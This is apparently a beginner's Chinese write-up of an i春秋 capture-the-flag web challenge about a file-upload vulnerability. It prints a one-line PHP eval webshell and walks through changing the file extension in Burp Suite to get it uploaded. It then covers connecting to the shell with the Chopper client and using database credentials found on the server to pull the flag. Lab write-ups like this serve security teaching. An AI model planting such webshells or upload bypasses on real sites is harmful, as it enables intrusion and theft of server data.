记录一下i春秋里的一道web题,题目类型是文件上传漏洞
传送门:https://www.ichunqiu.com/battalion?t=1&r=61025
主要就两个知识点,很基础,适合新手阅读,大佬勿喷哈
文件上传
来到上传点
先上传一个正常的.jpg文件(图片中写入一句话木马)
<?php eval($_POST['a']) ;?>
然后打开burp suite抓包,把后缀名jpg修改成php
点击Forward发送数据包,成功上传并返回上传路径,当前目录下的upload/hi.php
利用菜刀连接数据库
密码:a
类型:php
连上后并没发现flag,但是在html文件夹里找到数据库配置文件
猜测flag在数据库里,用菜刀连接数据库
在连接webshell的地方右击数据库管理
然后再点击配置
填写刚才找到的数据库配置文件,格式为
<T>mysql</T> //数据库
<H>localhost</H> //数据库地址
<U>ctf</U> //账号
<P>ctfctfctf</P> //密码
连接成功,在ctf库中找到flag